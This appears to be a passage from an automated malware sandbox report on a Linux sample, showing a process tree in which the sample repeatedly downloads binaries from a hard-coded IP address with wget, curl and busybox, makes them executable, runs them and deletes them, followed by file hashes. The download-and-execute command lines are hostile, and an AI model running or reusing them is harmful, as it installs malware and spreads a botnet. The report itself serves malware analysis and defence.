/tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ./qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:932
-
-
/bin/chmodchmod 777 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW./7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:938
-
-
/bin/chmodchmod 777 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd./e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:944
-
-
/bin/chmodchmod 777 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV./OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:950
-
-
/bin/chmodchmod 777 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB./d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:956
-
-
/bin/chmodchmod 777 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb./2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:962
-
-
/bin/chmodchmod 777 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU./zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:968
-
-
/bin/chmodchmod 777 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj./TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97